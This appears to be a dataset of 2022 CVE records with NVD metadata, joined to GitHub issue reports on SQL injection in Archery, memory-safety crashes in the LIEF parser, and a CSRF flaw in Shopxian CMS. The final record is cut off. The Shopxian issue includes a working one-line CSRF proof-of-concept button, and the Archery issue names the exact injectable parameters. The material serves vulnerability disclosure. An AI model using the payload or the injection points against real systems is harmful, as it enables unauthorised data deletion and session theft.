https://github.com/hhyo/Archery/issues/1841
[ "Third Party Advisory" ]
github.com
[ "hhyo", "Archery" ]
### 重现步骤 https://github.com/hhyo/Archery/blob/v1.8.5/sql/slowlog.py#L167 The checksum parameter of the report interface is not escaped, and it is pass into the SQL statement for execution, results in SQL injection. Any logged-in user can execute SQL injection and steal other user's django session_key from database and can get DBA role permission. https://github.com/hhyo/Archery/blob/v1.8.5/sql/db_diagnostic.py#L57 The parameter ThreadIDs of the create_kill_session interface is not converted to int type, resulting in SQL injection. Users in the DBA role can bypass query restrictions. https://github.com/hhyo/Archery/blob/v1.8.5/sql/db_diagnostic.py#L88 The parameter ThreadIDs of the kill_session interface is not converted to int type, resulting in SQL injection, and because the result of the first SQL output is used as SQL statement, it will run again in the MySQL instance , results in Second Order SQL injection, can execution of arbitrary SQL statements, and users in the DBA role can bypass the SQL review process to execute arbitrary SQL statements. ### 预期外的结果 SQL injection without priveleges and SQL injection modify any data bypass the SQL review restrict. Any login user can combine these vulns to execute arbitrary SQL statements without restriction or logging. ### 日志文本 _No response_ ### 版本 v1.8.5 ### 部署方式 Docker ### 是否还有其他可以辅助定位问题的信息?比如数据库版本等 _No response_
Multiple SQL injection
https://api.github.com/repos/hhyo/Archery/issues/1841/comments
1
2022-09-19T02:27:58Z
2022-09-19T13:47:02Z
https://github.com/hhyo/Archery/issues/1841
1,377,302,318
1,841
4,131
CVE-2022-38306
2022-09-13T21:15:09.427
LIEF commit 5d1d643 was discovered to contain a heap-buffer overflow in the component /core/CorePrPsInfo.tcc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/763" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/763" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "2B9842CE-CF1E-43E6-B3DF-9701F5DFE1DF", "versionEndExcluding": "0.12.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/lief-project/LIEF/issues/763
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
###### version ``` latest master [5d1d643](https://github.com/lief-project/LIEF/commit/5d1d643a0c46437b57d35654690e03d26d189070) ``` ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64) ###### Build step ``` cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ``` ###### Run ``` ./build/examples/c/elf_reader poc ``` [poc.zip](https://github.com/lief-project/LIEF/files/9288601/poc.zip) ###### AddressSanitizer output ``` Can't access the content of section #0 Can't access the content of section #1 Can't access the content of section #2 ================================================================= ==2292604==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d000000268 at pc 0x7f5b35470a7d bp 0x7ffe10d8f4c0 sp 0x7ffe10d8ec68 READ of size 109 at 0x60d000000268 thread T0 #0 0x7f5b35470a7c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 #1 0x55a087822aa7 in std::char_traits<char>::length(char const*) /usr/include/c++/9/bits/char_traits.h:342 #2 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::assign(char const*) /usr/include/c++/9/bits/basic_string.h:1443 #3 0x55a087822aa7 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(char const*) /usr/include/c++/9/bits/basic_string.h:709 #4 0x55a087822aa7 in void LIEF::ELF::CorePrPsInfo::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.tcc:41 #5 0x55a087822aa7 in LIEF::ELF::CorePrPsInfo::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:156 #6 0x55a0878260de in LIEF::ELF::CorePrPsInfo::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CorePrPsInfo.cpp:44 #7 0x55a0877383f3 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:150 #8 0x55a08773bbe0 in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92 #9 0x55a08767077d in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857 #10 0x55a08767077d in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568 #11 0x55a0876ec34e in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296 #12 0x55a08767371e in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323 #13 0x55a087674f03 in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342 #14 0x55a087383c06 in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67 #15 0x55a087342c96 in main /home/wcc/LIEF/examples/c/elf_reader.c:16 #16 0x7f5b34eef0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #17 0x55a08738373d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x31c73d) 0x60d000000268 is located 0 bytes to the right of 136-byte region [0x60d0000001e0,0x60d000000268) allocated by thread T0 here: #0 0x7f5b35518587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x55a08773b79b in __gnu_cxx::new_allocator<unsigned char>::allocate(unsigned long, void const*) /usr/include/c++/9/ext/new_allocator.h:114 #2 0x55a08773b79b in std::allocator_traits<std::allocator<unsigned char> >::allocate(std::allocator<unsigned char>&, unsigned long) /usr/include/c++/9/bits/alloc_traits.h:443 #3 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_allocate(unsigned long) /usr/include/c++/9/bits/stl_vector.h:343 #4 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) /usr/include/c++/9/bits/stl_vector.h:358 #5 0x55a08773b79b in std::_Vector_base<unsigned char, std::allocator<unsigned char> >::_Vector_base(unsigned long, std::allocator<unsigned char> const&) /usr/include/c++/9/bits/stl_vector.h:302 #6 0x55a08773b79b in std::vector<unsigned char, std::allocator<unsigned char> >::vector(std::vector<unsigned char, std::allocator<unsigned char> > const&) /usr/include/c++/9/bits/stl_vector.h:552 #7 0x55a08773b79b in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:89 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:354 in __interceptor_strlen Shadow bytes around the buggy address: 0x0c1a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1a7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1a7fff8010: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa 0x0c1a7fff8020: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1a7fff8030: 00 00 00 fa fa fa fa fa fa fa fa fa 00 00 00 00 =>0x0c1a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c1a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1a7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2292604==ABORTING ```
heap-buffer-overflow in elf_reader
https://api.github.com/repos/lief-project/LIEF/issues/763/comments
1
2022-08-09T08:23:03Z
2022-08-10T06:05:42Z
https://github.com/lief-project/LIEF/issues/763
1,332,896,530
763
4,132
CVE-2022-38307
2022-09-13T21:15:09.480
LIEF commit 5d1d643 was discovered to contain a segmentation violation via the function LIEF::MachO::SegmentCommand::file_offset() at /MachO/SegmentCommand.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/764" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/764" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "2B9842CE-CF1E-43E6-B3DF-9701F5DFE1DF", "versionEndExcluding": "0.12.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/lief-project/LIEF/issues/764
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
###### version ``` latest master 5d1d643 ``` ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64) ###### Build step ``` cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ``` ###### Run ``` ./build/examples/c/macho_reader poc ``` [poc.zip](https://github.com/lief-project/LIEF/files/9289369/poc.zip) ###### AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==2360258==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000068 (pc 0x557d2bd89c98 bp 0x0ffffe483d3e sp 0x7ffff241e9b8 T0) ==2360258==The signal is caused by a READ memory access. ==2360258==Hint: address points to the zero page. #0 0x557d2bd89c97 in LIEF::MachO::SegmentCommand::file_offset() const /home/wcc/LIEF/src/MachO/SegmentCommand.cpp:149 #1 0x557d2bac147d in LIEF::MachO::Binary::segment_from_offset(unsigned long) const /home/wcc/LIEF/src/MachO/Binary.cpp:541 #2 0x557d2bbd3252 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_generic_bind<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:1382 #3 0x557d2bc40fc8 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse_dyldinfo_binds<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:1356 #4 0x557d2bc40fc8 in boost::leaf::result<LIEF::ok_t> LIEF::MachO::BinaryParser::parse<LIEF::MachO::details::MachO64>() /home/wcc/LIEF/src/MachO/BinaryParser.tcc:113 #5 0x557d2bb3ff6e in LIEF::MachO::BinaryParser::init_and_parse() /home/wcc/LIEF/src/MachO/BinaryParser.cpp:145 #6 0x557d2bb42ff9 in LIEF::MachO::BinaryParser::parse(std::unique_ptr<LIEF::BinaryStream, std::default_delete<LIEF::BinaryStream> >, unsigned long, LIEF::MachO::ParserConfig const&) /home/wcc/LIEF/src/MachO/BinaryParser.cpp:125 #7 0x557d2b665077 in LIEF::MachO::Parser::build() /home/wcc/LIEF/src/MachO/Parser.cpp:174 #8 0x557d2b667ce0 in LIEF::MachO::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::MachO::ParserConfig const&) /home/wcc/LIEF/src/MachO/Parser.cpp:64 #9 0x557d2b590706 in macho_parse /home/wcc/LIEF/api/c/MachO/Parser.cpp:27 #10 0x557d2b555885 in main /home/wcc/LIEF/examples/c/macho_reader.c:148 #11 0x7f9573af60b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #12 0x557d2b58f13d in _start (/home/wcc/LIEF/build/examples/c/macho_reader+0x31313d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/wcc/LIEF/src/MachO/SegmentCommand.cpp:149 in LIEF::MachO::SegmentCommand::file_offset() const ==2360258==ABORTING ```
SEGV in SegmentCommand.cpp:149
https://api.github.com/repos/lief-project/LIEF/issues/764/comments
0
2022-08-09T09:54:15Z
2022-08-10T05:27:03Z
https://github.com/lief-project/LIEF/issues/764
1,333,006,398
764
4,133
CVE-2022-38329
2022-09-13T21:15:09.537
An issue was discovered in Shopxian CMS 3.0.0. There is a CSRF vulnerability that can delete the specified column via index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://albert5888.github.io/posts/CVE-2022-38329/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhangqiquan/shopxian_cms/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://albert5888.github.io/posts/CVE-2022-38329/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zhangqiquan/shopxian_cms/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopxian:shopxian_cms:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C3E351B5-8095-4F9D-B555-EBD4349D1985", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/zhangqiquan/shopxian_cms/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zhangqiquan", "shopxian_cms" ]
Vulnerability details: When the administrator logs in, click the button will delete the specified column. Vulnerability POC: ```<input type ="button" onclick="javascript:location.href='http://127.0.0.1/index.php/contents-admin_cat-finderdel-model-ContentsCat.html?id=17'" value="Click Me!!!"></input>``` CSRF HTML: ![image](https://user-images.githubusercontent.com/51775056/184215878-23498ae8-0246-44b9-84ed-8f0c1735b466.png) and click the button ![image](https://user-images.githubusercontent.com/51775056/184216466-ac4a20ec-ed0b-468a-ac5b-df40c2309c50.png) Successfully deleted ![image](https://user-images.githubusercontent.com/51775056/184215983-02818c76-90c9-4545-a74e-c91d6c27195f.png)
CSRF vulnerable
https://api.github.com/repos/zhangqiquan/shopxian_cms/issues/4/comments
0
2022-08-11T18:49:55Z
2022-08-11T18:49:55Z
https://github.com/zhangqiquan/shopxian_cms/issues/4
1,336,357,318
4
4,134
CVE-2022-38495
2022-09-13T21:15:09.590
LIEF commit 365a16a was discovered to contain a heap-buffer overflow via the function print_binary at /c/macho_reader.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/767" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/767" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4", "versionEndExcluding": null, "versionEndIncluding": "0.12.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/lief-project/LIEF/issues/767
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
###### Version ``` latest master 365a16a ``` ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64) ###### Build step ``` cmake -DLIEF_ASAN=ON ../ ``` ###### Run ``` ./build/examples/c/macho_reader poc ``` [poc.zip](https://github.com/lief-project/LIEF/files/9299163/poc.zip) ###### Output ``` Can't read the state data Can't read the raw data of the load command Binary Name: poc Header ======== Magic: 0xcefaedfe CPU Type: ARM64 CPU SubType: 0x0 File type: OBJECT Number of commands: 0x13a Commands size: 0x0 flags: 0x0 reserved: 0x0 Commands ======== THREAD 0x4040000f 0x00001c ================================================================= ==3241437==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000152 at pc 0x555c3f7df416 bp 0x7ffc25ef7040 sp 0x7ffc25ef7030 READ of size 1 at 0x602000000152 thread T0 #0 0x555c3f7df415 in print_binary /home/wcc/LIEF/examples/c/macho_reader.c:39 #1 0x555c3f7dff11 in main /home/wcc/LIEF/examples/c/macho_reader.c:150 #2 0x7fe3286cb0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #3 0x555c3f7debfd in _start (/home/wcc/LIEF/build/examples/c/macho_reader+0x280bfd) 0x602000000152 is located 1 bytes to the right of 1-byte region [0x602000000150,0x602000000151) allocated by thread T0 here: #0 0x7fe328cf2808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x555c3f8e3d36 in LIEF::MachO::init_c_commands(Macho_Binary_t*, LIEF::MachO::Binary*) /home/wcc/LIEF/api/c/MachO/LoadCommand.cpp:31 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/wcc/LIEF/examples/c/macho_reader.c:39 in print_binary Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 fa 0x0c047fff8010: fa fa fd fa fa fa 00 fa fa fa 00 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00 00 fa fa 00 00 fa fa[01]fa fa fa 00 fa 0x0c047fff8030: fa fa 00 fa fa fa 00 fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3241437==ABORTING ```
heap-buffer-overflow in macho_reader.c
https://api.github.com/repos/lief-project/LIEF/issues/767/comments
1
2022-08-10T10:26:03Z
2022-08-13T05:01:09Z
https://github.com/lief-project/LIEF/issues/767
1,334,409,301
767
4,135
CVE-2022-38496
2022-09-13T21:15:09.647
LIEF commit 365a16a was discovered to contain a reachable assertion abort via the component BinaryStream.hpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/765" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/765" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4", "versionEndExcluding": null, "versionEndIncluding": "0.12.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/lief-project/LIEF/issues/765
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
###### version ``` latest master 365a16a ``` ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64) ###### Build step ``` cmake -DLIEF_ASAN=ON ../ ``` ###### Run ``` ./build/examples/c/macho_reader poc ``` [poc.zip](https://github.com/lief-project/LIEF/files/9299006/poc.zip) ###### Output ``` Segment : content corrupted! Can't parse section in #0 terminate called after throwing an instance of 'std::length_error' what(): vector::_M_default_append [1] 3227500 abort ./build/examples/c/macho_reader poc ```
Abort in BinaryStream.hpp
https://api.github.com/repos/lief-project/LIEF/issues/765/comments
0
2022-08-10T10:05:20Z
2022-08-13T05:00:36Z
https://github.com/lief-project/LIEF/issues/765
1,334,384,359
765
4,136
CVE-2022-38497
2022-09-13T21:15:09.703
LIEF commit 365a16a was discovered to contain a segmentation violation via the component CoreFile.tcc:69.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/766" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/766" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "B2A9F55D-96B8-4830-A6DB-5D04F75406E4", "versionEndExcluding": null, "versionEndIncluding": "0.12.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/lief-project/LIEF/issues/766
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
###### version ``` latest master 365a16a ``` ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.13.0-52-generic x86_64) ###### Build step ``` cmake -DLIEF_ASAN=ON ../ ``` ###### Run ``` ./build/examples/c/elf_reader poc ``` [poc.zip](https://github.com/lief-project/LIEF/files/9299058/poc.zip) ###### Output ``` Can't access the content of section #0 Can't parse section #01 Binary doesn't have a program header AddressSanitizer:DEADLYSIGNAL ================================================================= ==3230843==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x559aec0a79de bp 0x0fffef333808 sp 0x7fff7999c000 T0) ==3230843==The signal is caused by a WRITE memory access. ==3230843==Hint: address points to the zero page. #0 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:187 #1 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_set_length(unsigned long) /usr/include/c++/9/bits/basic_string.h:220 #2 0x559aec0a79dd in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator=(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&&) /usr/include/c++/9/bits/basic_string.h:756 #3 0x559aec0a79dd in void LIEF::ELF::CoreFile::parse_<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.tcc:69 #4 0x559aec09aa70 in LIEF::ELF::CoreFile::parse() /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:114 #5 0x559aec09aa8d in LIEF::ELF::CoreFile::make(LIEF::ELF::Note&) /home/wcc/LIEF/src/ELF/NoteDetails/core/CoreFile.cpp:38 #6 0x559aebfdeb66 in LIEF::ELF::Note::details() /home/wcc/LIEF/src/ELF/Note.cpp:156 #7 0x559aebfe14ee in LIEF::ELF::Note::Note(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, std::allocator<unsigned char> > const&, LIEF::ELF::Binary*) /home/wcc/LIEF/src/ELF/Note.cpp:92 #8 0x559aebf183ac in std::_MakeUniq<LIEF::ELF::Note>::__single_object std::make_unique<LIEF::ELF::Note, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE, std::vector<unsigned char, 